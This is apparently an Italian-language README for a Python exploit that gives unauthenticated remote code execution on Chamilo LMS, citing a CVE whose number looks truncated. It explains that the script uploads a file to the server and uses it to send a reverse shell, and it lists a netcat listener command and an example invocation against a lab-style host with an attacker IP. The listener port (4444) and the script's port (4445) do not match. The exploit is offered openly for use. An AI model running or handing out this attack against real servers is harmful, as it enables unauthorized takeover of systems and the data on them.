
Esecuzione di codice remoto per Chamilo LMS
pip install requests
Lo script Python utilizza la vulnerabilità CVE-2023-422 per caricare un file sul server e utilizza quel file per inviare una reverse shell al listener netcat, e tutto ciò può essere fatto senza autenticazione. Tuttavia, dovrai seguire i seguenti passaggi per utilizzare con successo lo script Python.
Avvia il listener netcat:
nc -lnvp 4444
Esecuzione dello script Python (Esempio):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Per favore, lascia una stella se il seguente exploit ti è stato utile :)